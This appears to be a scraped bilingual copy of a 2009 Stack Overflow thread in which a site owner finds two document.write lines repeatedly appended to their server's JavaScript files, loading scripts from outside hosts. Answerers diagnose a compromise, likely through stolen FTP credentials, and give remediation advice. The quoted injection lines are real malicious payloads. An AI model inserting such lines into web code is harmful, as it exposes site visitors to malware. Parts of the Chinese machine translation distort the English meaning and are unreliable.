堆栈内存溢出
  简体   繁体   English

JavaScript代码注入我的网站页面

[英]JavaScript Code injected into my website pages

 原文  2009-11-22 20:10:39       .net/ asp.net/ javascript/ xss/ security

问题描述

I need to know if there is any way of writing additional code to JavaScript files already deployed on the server. 我需要知道是否有任何方法可以将其他代码写入服务器上已部署的JavaScript文件。

I am facing a problem with an ASP.NET 2.0 website and it is related to the JavaScript files which I have on some of the pages. 我遇到了一个ASP.NET 2.0网站问题,它与某些页面上的JavaScript文件有关。 The problem is that when I upload the JavaScript files along with other files it works fine, but after sometime (one or two days) the JavaScript files get changed and two additional lines are added at the bottom of each of them. 问题是,当我将JavaScript文件与其他文件一起上传时,它可以正常工作,但是一段时间(一两天)后,JavaScript文件被更改,并且在每个文件的底部添加了两行。 Those two lines are this: 这两行是这样的: 

document.write('<script src=http://kingsoftus.com/App_Code/tsx2.php ><\/script>');
document.write('<script src=http://eco-battery.co.uk/images/battguide.php ><\/script>');

This is causing my aspx pages to load something from these unknown urls. 这导致我的aspx页面从这些未知的URL中加载内容。 This thing causes errors and the aspx page does not get loaded or gets loaded with an error. 这件事会导致错误,并且无法加载aspx页面或加载错误。 I suspect there is something wrong on the server, but I need to know if there is any possibility that someone (virus or hacker) could just add these two lines to any JavaScript file on the server. 我怀疑服务器上有问题,但是我需要知道是否有人(病毒或黑客)可以将这两行添加到服务器上的任何JavaScript文件中。

4 个解决方案

解决方案1
 10  2009-11-22 20:14:33

Your server is compromised. 您的服务器已损坏。 The added links point to malware-flagged sites. 添加的链接指向带有恶意软件标记的站点。 The safest approach is to wipe the server and restore from backup. 最安全的方法是擦除服务器并从备份中还原。 If you don't own server maintenance, contact those who do as soon as you can, and inform them of the infection. 如果您不拥有服务器维护服务,请尽快与服务人员联系,并告知他们感染情况。 Take the server down to avoid infecting those who visit your site. 关闭服务器,避免感染那些访问您网站的人。

As to what caused the infection, some research might bring up specifics for the signatures you're seeing. 至于导致感染的原因,一些研究可能会针对您所看到的特征提供详细信息。 It could be anything from old, unpatched libraries to XSS vulnerabilities in your code to a careless employee with an infected flash drive. 从旧的,未打补丁的库到您代码中的XSS漏洞,再到一个随心所欲的员工都被感染了闪存驱动器,可能是什么。

EDIT : you say in comments that you don't manage the server. 编辑 :您在评论中说您不管理服务器。 While the provider is evaluating the infection, evaluate your code for possible vulnerabilities. 提供程序评估感染时,请评估您的代码是否存在漏洞。 Here's an MSDN article to start with ( How To: Prevent Cross-Site Scripting in ASP.NET ). 这是MSDN文章的开头(方法: 如何防止ASP.NET中的跨站点脚本编写 )。 An older SO question ( What should a developer know before building a public web site? ) has some great answers covering security aspects. 较旧的SO问题( 开发人员在构建公共网站之前应了解什么? )在安全方面有一些不错的答案。

解决方案2
 3 已采纳  2009-11-22 20:22:05

Saqib, another poster pointed out that your server his compromised. 萨奇布(Saqib)的另一位海报指出,您的服务器受到了损害。 He's right. 他是对的。 He's somehow able to inject JavaScript into your pages. 他能够以某种方式将JavaScript注入您的页面。

There are many possibilities: 有很多可能性:

  1. Do you have anywhere where a user can insert text (a textbox, a dropdownlist, anything?) It doesn't even have to allow them to insert text, since they can intercept the request and POST from somewhere other than the form). 用户是否可以在任何地方插入文本(文本框,下拉列表等)?它甚至不必允许他们插入文本,因为他们可以从表单以外的其他地方截取请求和POST。
  2. Do you properly encode everything that is sent to your database? 是否正确编码了发送到数据库的所有内容?
  3. Do you suffer from SQL injection issues? 您是否遭受SQL注入问题的困扰?
  4. Have you changed your password recently? 您最近是否更改过密码?
  5. Do you use FTP (and not SFTP) for transferring files to your server? 您是否使用FTP(而非SFTP)将文件传输到服务器?

If you answered yes to any of these questions, that's a potential hole. 如果您对以上任何一个问题的回答为“是”,则可能是一个漏洞。 No, the problem is probably not with ASP.NET or IIS; 不,问题可能出在ASP.NET或IIS上。 it's probably a hole in your code. 这可能是您的代码中的一个漏洞。

解决方案3
 1  2009-11-22 20:22:57

There's a million ways to screw up security. 有上百万种方法可以加强安全性。 Someone has gotten access to ftp? 有人可以访问ftp吗? Server admin screwing with you? 服务器管理员搞砸了吗? Insecure upload/download scripts, publicly writable directory? 上传/下载脚本不安全,可公开写入目录? Some crappy cronjob that indiscriminately mauls files? 某些乱糟糟的cronjob乱涂了锉刀? I have no idea. 我不知道。 Do you run the server? 您运行服务器吗?

Back everything up, change all your passwords, check that your up/download scripts are secure, check permissions on everything -- or maybe move to another server/restore if it's yours. 备份所有内容,更改所有密码,检查您的上传/下载脚本是否安全,检查所有内容的权限-或如果属于您,则可能移至其他服务器/还原。 Actually just do that last thing, and then check the rest, because this is a "code red" kind of thing. 实际上,只做最后一件事,然后检查其余的事情,因为这是“红色代码”之类的事情。

EDIT: Now with less linux 编辑:现在更少的Linux

解决方案4
 1  2009-11-22 21:38:40

I agree with the existing posts about the importance of guarding aganist XSS and SQL injection. 我同意现有的文章,其中提到了保护aganist XSS和SQL注入的重要性。

However, my first guess in this case would be an FTP account compromise. 但是,在这种情况下,我的第一个猜想是FTP帐户遭到破坏。 There's a lot of this about at the moment. 此刻有很多事情。 A trojan infects a client machine and steals the FTP passwords either stored in saved accounts or live at login-time. 特洛伊木马会感染客户端计算机,并窃取存储在已保存帐户中或在登录时有效的FTP密码。 An automated tool then eventually gets around to using the stolen account to log into your server and change the files to include links to malware exploits (often installing the same client-side password-stealing trojan). 然后,一个自动化工具最终开始使用被盗的帐户登录您的服务器并更改文件,以包含指向恶意软件漏洞的链接(通常安装相同的客户端密码窃取木马)。

So as well as ensuring the server and your application code are secure, you need to make sure any computers you use to log into the FTP account are clean. 因此,除了确保服务器和应用程序代码安全外,还需要确保用于登录FTP帐户的所有计算机都是干净的。 Your machine is not clean just because one anti-virus tool thinks so: these days AV is absolutely hopeless at detecting the enormous range of live malware, and even worse at deleting it. 您的机器并不干净,仅仅是因为一种防病毒工具这样认为:如今,AV绝对无法检测到大量的实时恶意软件,甚至更糟的是删除它。 Take multiple AV checker opinions, and if you have ever had an infection on the machine before consider it still infected and reinstall the OS, because chances are the AV hasn't cleaned it completely. 采取多个AV检查器的意见,如果您曾经在计算机上感染过病毒,则认为它仍被感染并重新安装操作系统,因为AV可能没有完全清除它。

In the longer term, lock down clients you use for development (uninstall plugins, increase security settings, ensure all net-facing software is up-to-date) and use SFTP to upload files to your server. 从长远来看,锁定用于开发的客户端(卸载插件,提高安全设置,确保所有面向网络的软件都是最新的),并使用SFTP将文件上传到您的服务器。 Nobody should be using FTP in 2009. 2009年没有人应该使用FTP。

暂无
暂无

声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.

相关问题 访问由RegisterClientScriptBlock在ASPX页面的客户端JavaScript块中注入的JavaScript代码 - Accessing javascript code injected by RegisterClientScriptBlock in client javascript block of aspx page "如何在 IE 兼容模式下调试注入的 javascript 代码?" - How to debug injected javascript code in IE compatibility mode? 如何将JIT编译的代码注入内存并执行? - How is JIT compiled code injected in memory and executed? 网站项目(ASP.NET)-我的代码将编译到什么程序集? - Website project (ASP.NET) - what assembly will my code compile to? 发布网站某些页面失败 - Publishing Website fails for some pages Com包装器和代码页 - Com wrapper and code pages 通过现有网站访问CRM页面 - access CRM Pages through a existing website 如何在Web页面网站中不使用_Layout页面 - How to NOT use the _Layout page in a Web Pages website 在网站所有页面的正文标签中附加功能 - Append function in body tag of all pages in website 我怎样才能让一个Visual Studio插件,张贴我的代码到一个网站? - How can I make a Visual Studio addon that posts my code to a website?
相关标签
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM